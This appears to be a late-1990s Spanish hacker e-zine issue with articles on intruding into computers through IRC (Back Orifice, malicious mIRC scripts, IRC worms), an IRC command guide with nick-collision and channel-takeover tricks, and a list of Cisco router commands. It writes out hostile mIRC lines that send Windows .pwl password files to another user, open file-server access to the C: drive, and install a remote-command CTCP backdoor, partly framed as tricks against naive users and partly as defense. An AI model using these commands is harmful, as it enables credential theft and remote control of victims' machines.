|®ÏÎ(r) SatMex (r)Îϯ|


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ IRC - ToMaCHeLi/ZeD ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

MANERAS DE COLARSE (y prevenirse) EN UN HD ATRAVES DEL IRC £
POR
ToMaCHeLi--(http://members.tripod.com/~tomacheli)

Y

ZeD------(http://www.angelfire.com/ak/HACKZED/ZED2.html)

MIEMBROS DEL HaCk`S-wEb-RiNg--(http://come.to/HaCkS-wEb-RiNg)


ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
³INTRODUCCION³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ

Debido al creciente aumento de maneras que existen de entrar y/o controlar
computadoras ejenas a traves del irc, nos hemos decidido a escribir este
articulo para raregazz.
En el trataremos de explicar las formas que hay para introducirse, controlar..
un ordenador de forma remota a traves del irc.

Si quieres comentarnos algo, aqui tienes nuestros mails:
ToMaCHeLi----tomacheli@geocities.com
ZeD----zed@mixmail.com

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³FIN DE LA INTRODUCCION³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


BACK ORIFICE.
--------------------------------------

El Back Orifice lo creo no hace demasiado tiempo un grupo de hackers
americanos con el fin de poder entrar en cualquier ordenador sabiendo tan solo
la IP del usuario.
Si te mandan un .EXE NO LO EJECUTES A MENOS QUE ESTES COMPLETAMENTE SEGURO
DE LO QUE ES.

Muchas personas estan propagando por inet el programa SERVER de diversas
maneras (lo mas extendido es por el IRC). Y aqui entra en papel el ignorante
internauta que se dedica a ejecutarlo en su maquina creyendo que es un
autoextractor de fotos X :). Una vez ejecutado SORPRESA!, el archivo
desaparece ¿?¿?¿? otia ¿?¿?¿?, y la pobre victima piensa, (bah, me habra
llegado defectuoso el archivo), y no le da importancia.
Si, pues chaval FELICIDADES acabas de meter un troyano en tu sistema :),
cualquiera que sepa tu IP podra hacer en tu PCera casi lo que le de la gana.
Tas cubierto de gloria :)) (mas bien de mierda que OTROS te han tirao encima).

El troyano en cuestion funciona de la siguiente manera:
cuando ejecutas el .EXE este instala un programa que se llama (espacio).exe
y borra el ejecutable que te han pasado.
Cada vez que reinicies tu windo2 (solo funciona en este sistema) el troyano se
auntoinstalara y se cargara en memoria (osea que olvidate de borrar el archivo
(espacio).exe,por que no funcionara).

El troyano deja abierto un puerto en tu sistema LIBRE DE CUALQUIER PROTECCION.
este es un puerto llamado "
31173" (sin comillas)(31173=elite) A traves de un
programa que debe tener la persona que quiere acceder a tu computadora, este
accedera directamente a tu c:\ a traves de unos comandos muy simples,pudiendo
hacer lo que le de la gana dentro de tu ordenador,subir y bajar archivos,abrir
mas puertos,ajecutar programas,incluso formatear el disco duro.
Si notas que te esta pasando alguna de estas cosas lo que puedes hacer es lo
siguiente:
desconectate de internet y procede a borrar el troyano de la siguiente manera:

Pa que lo pilles rapido, el archivo se mueve del directorio donde esta y va a
parar al directorio :\windows\system convertido en (espacio).exe y ademas en
el editor registros (REGEDIT), carpeta RunServices (puede ser que este en otra
carpeta) se incorpora la siguiente linea en DATOS: "
(espacio).exe", para que
nada mas arrancar el ventanucos el troyano quede en memoria. Y diras bah, pos
entonces borro el archivo (espacio).exe y yasta.
Si hijo si, prueba y veras, ni flowers, al tenerlo en memoria no deja borrarlo.
Y entonces??, a jodese jejeje.

NO, TRANQUILO HAY UNA SOLUCION (por lo menos a mi me va).
Pero eso te lo dire mas adelante, ahora sigue leyendo....


Como puedo saber si tengo el troyano en el sistema?
---------------------------------------------------
La manera mas facil que hay es utilizar el programa CLIENT (cliente)
apuntando a la direccion IP 127.0.0.1 que es tu propia maquina, no se precisa
que estes conectado a inet. Cuando ya hallas apuntado a esta IP, desde el
cliente de BO manda un PING, si no te responde nada, vale estas limpio y no
tienes el troyano, pero si te pone algo como esto:

------- Packet received from 127.0.0.1 port 31337 -------
!PONG!1.20!DEFAULT!
------- End of data -------

Opssss, estas jodio, tan colao el troyano...

*****************************************************************************

Nota: Si no lo tienes en el sistema puedes metertelo y probar las maravillas
y putadas que te pueden hacer los demas (haciendotelas a ti mismo) ;)
y sin ningun peligro al no estar conectado a inet.

*****************************************************************************


Vale lo tengo y estoy muy asustao ¿como coño me lo quito?
---------------------------------------------------------

Puede que algunos ya lo hallais descubierto, para mi fue facil, la
verdad. Ya sabemos que al ejecutar el archivo del SERVER, este se convierte
en (espacio).exe y va a parar al directorio :\windows\system. (OJO, hay una
manera de configurar este nombre y es posible que no siempre el troyano sea
el (espacio).exe)
Vale, como he dicho antes si intentas borrarlo, nanai, por que ya
esta en memoria, asi que lo mas normal es pensar que puede haber una linea
donde hace que se ejecute el troyano en el archivo SYSTEM.INI o WIN.INI
al iniciar el ventanucos. Pos fui a buscarlo por alli y NOP nada de nada, lo
siguiente que pense es buscarlo en el editor de registros (REGEDIT), pos
palli voy, en el menu pincho: EDICION/BUSCAR/ pongo (espacio).exe y activo
CLAVES, VALORES y DATOS y ¡TACHAN! en una carpeta llamada RunServices (sigo
diciendo que puede estar en otra carpeta) aparece en DATOS el nombre del
archivito ¡YA LO TENEMOS! solo queda eliminar la linea de DATOS para ello
pincha donde pone el NOMBRE (suele ser (predeterminado)) y eliminalo, (la
carpeta no la borres) una vez eliminado ya puedes cerrar la ventana del
editor de registros (Nota: es posible que en la busqueda aparezcan mas
(espacio).exe pero solo debes borrar el de la carpeta RunServices o otras
en las que pueda estar y sepas que es la que carga el troyano).
Con todo esto hemos conseguido que la proxima vez que iniciemos el
ventanucos no se cargue en memoria el troyano, con lo que ya podras ir al
directorio :windows\system y borrar el archivo (espacio).exe (no lo vuelvas
a ejecutar o se te metera otra vez en el registro). Y por fin te has librado
del troyano.

Existen programas que dicen borrar este troyano,pero ES MENTIRA la mayoria
(si no todos)llevan alguna clase de virus dentro,osea que cambiaras este
virus por otro,por lo que no habras logrado mucho :(


SCRIPTS.
-------------------

Para alguien que sepa scripting le puede resultar muy sencillo controlar tu maquina
de forma remota atraves del irc,ya que en algo que puede resultar tan inocente
como una opcion para mandar un privado,puede esconder algun comando para que si
el esta conectado automaticamente le mandes tu preciado archivo de contraseñas o lo
que se le venga en gana en ese momento.
Te recomendamos que pilles algun manual de scripting (en INet los hay a patadas)
te lo empolles y revises el codigo del script que usas abitualmente,no sea que
resulte que cada vez que pides la lista de canales del servidor donde estes
estes mandando un archivo a una persona que no quieres que lo tenga.
Procura buscar comandos como los siguientes:

/send c:\windows\*.pwl cualquier_nick_que_haya_puesto

/fserve nick_que_haya_puesto 5 c:

o cosas de este estilo que te puedan parecer sospechosas.
Estos comandos pueden estar puestos de la siguiente manera
Ejemplos:

pidiendo la lista de canales:
/list /send c:\windows\*.pwl nick_al_que_llegara_el_archivo

entrando a un canal:
/join #$$?="
Entrar en el canal?" /fserve nick_al_que_daras_acceso 5 c:

recibiendo un texto (si ponen una determinada frase/palabra en un canal o privado)
on *:TEXT:!mandameloya*:#:/dcc send archivo_que_quiera_que_le_llegue $nick "
$+ %file $+ "
| /inc %fsendp | ignore -tacu5 $wildsite

Como puedes ver,estos comandos remotos pueden estar en cualquier sitio del script,
para localizarlos lo mas eficiente es buscarlos en la opcion de STATUS,MENUBAR y REMOTE
ya que es hay donde suele aver mas cantidad de comandos y es donde es mas dificil de
encontrar el comando remoto que hace que lo pases tan mal cuando estas conectado al irc


VIRUS DE IRC.
--------------------

Si ya sabemos que esto esta + visto que el tebeo,pero es otra manera +
¿nunca se te ha ocurrido investigar estos famosos "
virus"?
pues a mi si,fijate :o)

Si investigas un poco dentro del "
script.ini" veras que lo que hace es lo siguiente:
esta configurado para que cada vez que entres a un canal le mandes a todos los que
estan dentro de ese canal el fichero "
script.ini" ¿pero y si reconfiguramos el
"
script.ini" para que en vez de mandarselo a todo el canal solo le mande a una
persona en concreto el famoso "
pwl"?
esto no es muy dificil de hacer si revisas el codigo del "
script.ini" y cambias unos
pocos parametros (hay que saber algo de scripting).

En el caso del "
dmsetup.exe" es algo mas peculiar.
El archivo en cuestion es un binario (un ejecutable),por lo tanto tendras que saber
programar en el lenguaje que esta echo para poder modificarlo a tu gusto.
Detodas maneras el "
virus" sin modificar ya es una jodienda de por si,lo que hace
es lo siguiente:

tiene la particularidad de ser "
autoejecutable" osea que no hace falta que lo
clikees tu para que este se instale en tu maquina :(
Modifica algunas lineas del script.ini para que se autoenvie (igual que el "
script.ini")
Algunas de las versiones estudiadas actuan con mas particularidad e incluyen
pautas para desconectar a un usuario si recibe la frase "
tis to I who seem so sad"
(sin comillas claro).

Crea copias de si mismo en los directorios c:\windows y c:\mirc (precavido el jeje)
Intenta sobreescribir el autoexec.bat para restaurar copias de si mismo cada vez que
se reinicie la computadora y por si eso fuera poco encima cambia los directorios de
los fserve por c:\mirc lo que puede ser una putada si guardas logs con contraseñas
o algo asi en alguno de los subdiretorios de esta carpeta.

Eliminar estos dos archivos es algo relativamente simple:
para el script.ini:

en la linea donde escribes normalmete en el mirc pon lo siguiente:
"
/unload -rs script.ini" (sin las comillas obviamente)
lo que consigues con esto es descargar de la memoria del programa este archivo,pero cuando
lo vuelvas a utilizar este se volvera a cargar en memoria,para elimirarlo lo que deves
hacer cuando descarges de la memoria el archivo es lo siguiente:
donde escribes normalente en el mirc escribe esto: "
/removescript.ini" (sin las comillas)
y ya estara borrado el "
virus"
Para el "
dmsetup.exe" la cosa cambia un poco:
Cierra todos los programas que tengas abiertos,localiza todos los dmsetup.exe que tengas
en tu sistema (con la opcion de buscar del menu "
inicio" te sera muy facil) y borralos
todos,revisa los ficheros "
config.sys" y "autoexec.bat" y si tienes dudas sobre alguna
linea,sustituye ambos por copias de seguridad.
¿Que no tienes una copia de seguridad?¿pero en que estabas pensando cuando el win2 te dijo
que era recomendable hacer un disco de arranque?
Luego reinicia el equipo y reinstala el mirc,si sigues sufriendo anomalias a la hora hacer
funcionar este programa reinstala el win2 (hazlo encima del que tienes,no hace falta formatear)


ATRAVES DE LA LINEA DE COMANDOS.
---------------------------------------

Para esto es necesario que usen ingeniaria social con tigo (no te vamos a explicar lo
que es la ingenieria social por que es algo sobradamente conocido).

Existen una serie de comandos que si los introduces en donde normalmente escribes puedes
dejar que el otro controle tu programa del Mirc o que le des acceso a tu c:\ pudiendo
hacer los que le venga en gana con el.

/fserve su_nick 5 c:

/fserve= comando para abrirle una sesion de server al otro usuario
su_nick= aqui se pone el nick de la otra persona
5= cantidad de ficheros que puede bajar
c:= directorio a partir del que le das acceso

Este comando lo que hace es dar acceso completo a tu c:\ (o la carpeta que especifiques)
Podra subir,bajar,borrar...ficheros,la unica restriccion que pones es la carpeta
apartir de la que tiene acceso,y el numero de archivos que puede bajar.
Ademas cuando pones este comando te saldra una ventana (en ingles) diciendote lo que
estas haciendo (pero la mayoria de las veces la gente pasa de leerla)

ctcp 1:*:$1-
Este comando, introducido en los ctcp´s de mIRC, ejecuta cualkier orden
de forma remota.Es como el antiguo /ctpc nick DO.
ctcp ==> Client-To-Client-Protocol. Los version, ping, etc...
1 ==> nivel de usuario que ejecuta el ctcp.
* ==> como en DOS, comodin que sustituye al ctcp que nos hagan. Podriamos
definir aqui un VERSION PING, etc..
$1- ==> con este parametro, mirc toma en consideracion todo lo que nos envien.

¿Mu bonito verdad? pero te estaras preguntando ¿y como co¤e se usa? pos mu simple:
Hemos conseguido que el pavo introduzca este comando y estamos en el canal
#me_mola con el y me apetece que me de OP en este canal,pues ponemos lo siguiente
"
/ctcp su_nick mode #me_mola +o nuestro_nick" (sin comillas)
y bingo,ya tenemos op en el canal #me_mola,pero claro el tio dice "
coño si yo a este no
le he dado op" y se mosquea osea que este es un buen momento para hacer un "automass deop"
¿que no sabes como hacerlo? pos en la mayoria de los scripts (un poco modernos)
tienes una opcion para hacerlo, "
pero esque yo no uso ningun script"
¿pero tu en que mundo vives tio? en http://www.welcome.to/100scripts tienes una coleccion de
ellos muy grande,bajate alguno + rapido que inmediatamente :)
(si es el ZeD-wOrLd-ScRiPt mejor,jeje)
"
Bueno pero yo no quiero que me de OP lo que quiero es desconectarle del irc"
Bueno pues en ese caso ponlo siguiente:
"
/ctcp nick_del_personaje quit FRASE QUE TE APETEZCA QUE DIGA AL DESCONECTARSE"
(sin las comillas)
"
¿Y si quiero que diga algo sin que lo escriba?" pues pon esto:
"
/ctcp nick_del_personaje say FRASE QUE QUIERES QUE DIGA" (sin las comillas)
Tienes que tener cuidado con esta clase de "
ataques" por que al tio en cuestion
se le llenara la ventana de "
status" de mensajes diciendole quien sois.
Bueno supongo que el concepto lo habreis pillado puesto que es muy simple.

Bueno esto es una peque¤a muestra de como controlar,colarse...etc... atraves de
algo tan usado como es el irc,pero para muchas de estas cosas tienes que elejir
a alguien que sea un pardillo en esto del irc,pero los hay,valla si los hay ;)

byez


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ IRC (GUIA RAPIDA) - Yo_Soy ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


<ÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄ>
Û²±°³ I R C ³°±²Û
Û²±°³ GUIA RAPIDA ³°±²Û
<ÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄ>


IRC es un metodo de conversacion por Internet, sus siglas significan
Internet Relay Chat. Esta conversacion se lleva a cabo generalmente
mediante un cliente (programa que se conecta a un servidor y mismo
que presta un servicio) que se conecta a un servidor , asi nosotros
como usuarios utilizamos un apodo (nickname) y llevamos charlas en
lugares llamados "
canales".


C C C C C C C C C C C C
           
³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³
ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿
³ Servidor ³ ³ Servidor ³ ³ Servidor ³
³ IRC 2 ³ÄÄį³ IRC 1 ³®ÄÄij IRC 3 ³
ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ

Existen redes IRC, a los cuales se conecta el programa cliente (C),
estas redes estan formadas por varios servidores. De entre los
programas clientes destacan el mIRC, virc, etc.

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>[ LOS CANALES ]<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ


Es un grupo de uno o mas clientes, el canal es creado por un usuario
al entrar por primera vez, y deja de existir cuando el ultimo usuario
sale. Si un canal no existe el usuario que lo crea recive los
privilegios de operador del canal.

Los canales son creados con un nombre el cual se compone de una
cadena de caracteres y puede tener una longitud de 200 caracteres,
pero no es posible el uso de espacios o comas.


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>[ OPERADORES DEL CANAL ]<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ


Son los encargados del canal y por tanto tienen privilegios para
cambiar las caracteristicas del mismo, los reconoceras facilmente
porque veras un @ (arroba) al lado de su nombre. Entre las funciones
de un OP estan:

 Patear a usuarios
 Colocar un Baneo

Un BAN consiste en impedir que el usuario entre al canal.


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>[ SPLIT ]<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ


Ocurre cuando en la red se separa 1 o mas servidores entre si. Cuando
esto ocurre, en el canal solo quedan los conectados a ese respectivo
servidor en los diferentes lados del split.


ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ SERVIDOR 1 ³<ÍÍÍÍ>³ SERVIDOR 2 ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ

Para dar un idea, cuando hay un split los usuarios conectados al
servidor 1 ven desconectarse a los usuarios del servidor 2 y los
usuarios conectados al servidor 2 ven caer a los del 1.

Nosotros podemos aprovechar esto para 2 cosas (tal vez mas ;) :


 Colision de Nick
 Ganar OP

Despues del NetSplit viene el NetJoin que ocurre cuando el servidor
separado se une de nuevo a la red.

ÍÍÍ> Colision de Nick:

En el IRC el nickname es unico, por tanto, no pueden existir 2 con el
mismo nombre. Si tu tienes el nick de "
MENTE ", nadie en toda la red
puede usar ese nick. Digamos que el usuario "
MENTE" entro a la red
IRC por el Servidor 1, asi si hay un split entre el servidor 1 y 2
estos se separan, por tanto "
MENTE" deja de existir en el Servidor 2,
mas aun sigue conectado, pero unicamente en el Servidor 1.

Ahora, supongamos que queremos hacer caer al usuario "
MENTE", pero el
mendigo esta usando su Firewall y no cae :(..

Creamos un clon y entramos por el Servidor 2 y esperamos.. asi cuando
haya un NETJOIN (sucede despues del split cuando se unen los servers)
habra una colision (2 personas estan usando el mismo nick) lo que nos
trae por consecuencia un KILL a los 2 nicks.


ÍÍÍ> Ganar OP

Sucede cuando hay un split entonces nosotros nos lanzamos al servidor
que esta separado, creamos el canal que queremos tomar (por lo tanto
tendremos op) y esperamos que se vuelva a unir. No siempre funciona
porque si el canal que quieres tomar tiene un BOT y esta preparado a
la hora de hacer la union, puede que te quite el OP. :(...


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>[ WINGATE ]<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ


Una de las cosas mas vistas en el IRC ahora es ver a personas con una
IP diferente a la que deberian tener, pero sin spoofear, esto es
utilizando un Wingate, la forma mas sencilla si estamos utilizando
mIRC es ir a Setup -> Firewall -> y colocar la IP del Wingate, asi
cada vez que entremos a un servidor IRC lo usara como Proxy.
Un ejemplo de un Wingate es --> dslc00411.adsl.telusplanet.net
En la pagina de RareGaZz encontraras un escaner de Wingates ;)
La otra forma de conectarse a Irc por Wingate es:

/server ip-wingate 23
/quote irc.server.com 6667
/quote usuario lo_ke_sea lo_ke_sea mail@kesea.com lo_ke_sea
/quote nickname lo_ke_sea


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>[ Comandos Generales ]<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ


Cualquier cliente IRC tiene un lugar para introducir lo que vamos a
decir , ahi mismo colocaremos los comandos. Los comandos siempre
comenzaran con una "
/" , aquello que no comience con / se asumira
que se trata de un mensaje.


ÍÍÍ> Comandos Basicos


/NICK nuevo_nick
Cambia tu apodo con el cual seremos conocido en adelante,
generalmente tiene una longitud no mayor de 9 caracteres.

/LIST
Muestra los canales, usuarios y topic de cada uno.

/NAMES #canal
Muestra los usuarios que estan en cierto canal.

/WHOIS nickname
Muestra informacion acerca de alguien.

/WHOWAS nickname
Muestra informacion de alguien que acaba de salir.

/UWHO nickname
Muesta informacion del usuario.

/QUIT mensaje_opcional
Sale del IRC, puediendo opcionalmente dejar un mensaje de salida.

/SERVER servidor o i.p
Se conecta al servidor especificado.


ÍÍÍ> Comandos de Conversacion


/JOIN #canal
Entra al canal especificado.

/LEAVE #canal
Sale del canal especificado.

/MSG nickname texto
Manda un mensaje privado a un usuario.

/ME comentario
Manda un mensaje al canal con un comentario inciando con tu apodo.

/QUERY nickname
Comienza una conversacion privada con alguien.

/DCC CHAT nickname
/DCC CLOSE CHAT nickname
Comienza una conversacion directa de cliente a cliente.

/DCC SEND nickname path_archivo
Manda un archivo a un usuario.

/DCC GET nickname
Abre la conexion para recivir archivos.

/NOTIFY [+/-] nickname
Avisa de la prescencia de un usuario en la red.

/INVITE nickname #canal
Invita a un usuario a entrar a un canal.

/IGNORE nickname
Ignora a cierto usuario.


ÍÍÍ> Comandos de Mantenimiento del Canal (solo OP's)


/TOPIC #canal mensaje de topico
Cambia/asigna un mensaje de topico para el canal.


/MODE #canal [+|-]modo [nickname]
Cambia los modos del canal, entre ellos los siguientes:

o - dar/quitar op
p - canal privado
s - canal secreto
i - canal solo para invitados
t - solos los op pueden cambiar el topic
n - no permite mensajes externos
m - canal moderado
l - limite de usuarios
k - coloca un password al canal
v - da/quita voz - permite hablar en un canal moderado
b - coloca un baneo

/KICK #canal nickname
Patea del canal a un usuario.


ÍÍÍ> Otros Comandos


/CTCP nick argumento
Permite ver algunas caracteristicas del cliente/usuario, entre ellas
estan:
/CTCP nick PING <ÍÍ Manda un Ping
/CTCP nick VERSION <ÍÍ Ve la version de su cliente.
/CTCP nick FINGER <ÍÍ Trata de hacer un finger.

/PING nickname
Manda un Ping a un usuario.

/DNS [usuario]
Ve la IP y el DNS de un usuario.

/WHO cadena
Muestra informacion acerca de ciertos usuarios, ej.

/who *telmex.net.mx <ÍÍ Mostrara los usuarios que
tengan esa cadena


 VOCABULARIO 

Nickname: Apodo o sobrenombre con el cual somos conocidos en el IRC.

K-Line : Es cuando se impide la entrada de un usuario a un servidor.

Bot : Robot que se encarga de administrar el canal.

Lag : Retardo por la sobrecarga de informacion en IRC.

Wingate : Software utilizado para que 2 o mas sistemas utilizen la
misma linea, tambien son usados como Proxies.

PING : Acronimo de "
Packet Internetwork Groper". Se utiliza para
probar si la conexion esta activa o inactiva.

CTCP : Acronimo de "
Client-to-Client Protocol " ( Protocolo de
Cliente a Cliente).

Scripts : Son aditamentos para nuestro cliente, los mas famosos son
para mIRC, si quieres tener una idea de ello, visita la
siguiente pagina: http://www.arrakis.es/~alcon/scripts.htm


<=Yo-Soy=>
varf@bigfoot.com
<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Cisco Routers - GuyBrush ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Aqui teneis una breve descripcion de los comandos del Cisco. Espero que si
entrais en alguno, os sirva de algo:


COMANDOS DEL CISCO EN MODO NORMAL
---------------------------------
<1-99> Session number to resume
access-enable Create a temporary Access-List entry
clear Reset functions
connect Open a terminal connection
disable Turn off privileged commands
disconnect Disconnect an existing network connection
enable Turn on privileged commands
exit Exit from the EXEC
help Description of the interactive help system
lock Lock the terminal
login Log in as a particular user
logout Exit from the EXEC
name-connection Name an existing network connection
pad Open a X.29 PAD connection
ping Send echo messages
ppp Start IETF Point-To-Point Protocol (PPP)
resume Resume an active network connection
rlogin Open an rlogin connection
show Show running system information
slip Start Serial-line IP (SLIP)
systat Display information about terminal lines
telnet Open a telnet connection
terminal Set terminal line parameters
traceroute Trace route to destination
tunnel Open a tunnel connection
where List active connections
x3 Set X.3 parapeters on PAD


COMANDOS DEL CISCO EN MODO PRIVILEGIADO
---------------------------------------
<1-99> Session number to resume
access-enable Create a temporary Access-List entry
access-template Create a temporary Access-List entry
bfe For manual emergency modes setting
clear Reset functions
clock Manage the system clock
configure Enter configuration mode
connect Open a terminal connection
copy Copy configuration or image data
debug Debugging functions (see also 'undebug')
disable Turn off privileged commands
disconnect Disconnect an existing network connection
enable Turn on privileged commands
erase Erase flash or configuration memory
exit Exit from the EXEC
help Description of the interactive help system
lock Lock the terminal
login Log in as a particular user
logout Exit from the EXEC
name-connection Name an existing network connection
no Disable debugging functions
pad Open a X.29 PAD connection
ping Send echo messages
ppp Start IETF Point-to-Point Protocol (PPP)
reload Halt and perform a cold restart
resume Resume an active network connection
rlogin Open an rlogin connection
rsh Execute a remote command
send Send a message to other tty lines
setup Run the SETUP command facility
show Show running system information
slip Start Serial-line IP (SLIP)
start-chat Start a chat-script on a line
systat Display information about terminal lines
telnet Open a telnet connection
terminal Set terminal line parameters
test Test subsystems, memory, and interfaces
traceroute Trace route to destination
tunnel Open a tunnel connection
undebug Disable debugging functions (see also 'debug')
verify Verify checksum of a Flash file
where List active connections
write Write running configuration to memory, network, or terminal
x3 Set X.3 parameters on PAD


PARAMETROS DEL SHOW EN MODO NORMAL
----------------------------------
WORD Flash device information - format <dev:>[partition]
clock Display the system clock
history Display the session command history
hosts IP domain-name, lookup-style, nameservers, and host table
isdn ISDN information
modemcap Show Modem Capabilities database
ppp PPP parameters and statistics
sessions Information about Telnet connections
snmp snmp statistics
terminal Display terminal configuration parameters
users Display information about terminal lines
version System hardware and software status


PARAMETROS DEL SHOW EN MODO PRIVILEGIADO
----------------------------------------
WORD Flash device information - format <dev:>[partition]
access-expression List access expression
access-lists List access lists
accounting Accounting data for active sessions
aliases Display alias commands
arp ARP table
async Information on terminal lines used as router interfaces
bridge Bridge Forwarding/Filtering Database [verbose]
buffers Buffer pool statistics
cdp CDP information
clock Display the system clock
cmns Connection-Mode networking services (CMNS) information
compress Show compression statistics.
configuration Contents of Non-Volatile memory
controllers Interface controller status
debugging State of each debugging option
dhcp Dynamic Host Configuration Protocol status
dialer Dialer parameters and statistics
dnsix Shows Dnsix/DMDP information
dxi atm-dxi information
entry Queued terminal entries
flash System Flash information
flh-log Flash Load Helper log buffer
frame-relay Frame-Relay information
history Display the session command history
hosts IP domain-name, lookup style, nameservers, and host table
interfaces Interface status and configuration
ip IP information
isdn ISDN information
key Key information
line TTY line information
llc2 IBM LLC2 circuit information
logging Show the contents of logging buffers
memory Memory statistics
modemcap Show Modem Capabilities database
ppp PPP parameters and statistics
privilege Show current privilege level
processes Active process statistics
protocols Active network routing protocols
queue Show queue contents
queueing Show queueing configuration
registry Function registry information
reload Scheduled reload information
rhosts Remote-host+user equivalences
rmon rmon statistics
route-map route-map information
running-config Current operating configuration
sessions Information about Telnet connections
smds SMDS information
smf Software MAC filter
snapshot Snapshot parameters and statistics
snmp snmp statistics
spanning-tree Spanning tree topology
stacks Process stack utilization
standby Hot standby protocol information
startup-config Contents of startup configuration
subsys Show subsystem information
tcp Status of TCP connections
tech-support Show system information for Tech-Support
terminal Display terminal configuration parameters
users Display information about terminal lines
version System hardware and software status
whoami Info on current tty line
x25 X.25 information


PARAMETROS DEL DEBUG (SOLO PARA MODO PRIVILEGIADO)
--------------------------------------------------
aaa AAA Authentication, Authorization and Accounting
access-expression Boolean access expression
all Enable all debugging
arp IP ARP and HP Probe transactions
async Async interface information
bri-interface bri network interface events
broadcast MAC broadcast packets
callback Callback activity
cdp CDP information
chat Chat scripts activity
compress COMPRESS traffic
confmodem Modem configuration database
custom-queue Custom output queueing
dhcp DHCP client activity
dialer Dial on Demand
dnsix Dnsix information
domain Domain Name System
dxi atm-dxi information
eigrp EIGRP Protocol information
entry Incoming queue entries
ethernet-interface Ethernet network interface events
frame-relay Frame Relay
ip IP information
isdn ISDN information
lapb LAPB protocol transactions
list Set interface or/and access list for the next debug
command
llc2 LLC2 type II Information
modem Modem control/process activation
packet Log unknown packets
pad X25 PAD protocol
ppp PPP (Point to Point Protocol) information
priority Priority output queueing
probe HP Probe Proxy Requests
radius RADIUS protocol
serial Serial interface information
smf Software MAC filter
snapshot Snapshot activity
snmp SNMP information
spanning Spanning-tree information
standby Hot standby protocol
tacacs TACACS authentication and authorization
tbridge Transparent Bridging
telnet Incoming telnet connections
tftp TFTP packets
tunnel Generic Tunnel Interface
x25 X.25 information


Para acceder al Cisco debes hacer telnet y escribir el password
correspondiente. Si entras, lo haras en modo normal. Para acceder al modo
privilegiado debes poner 'enable' y te pedira otro password. Si lo superas ya
estaras en modo privilegiado.
Para ver la ayuda de los comandos debes escribir '?'. Si quieres ver la ayuda
de un comando en concreto, por ejemplo 'debug', deberas escribir 'debug ?'

[ Quiero darle las gracias a Mijail por su gran ayuda en este articulo ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
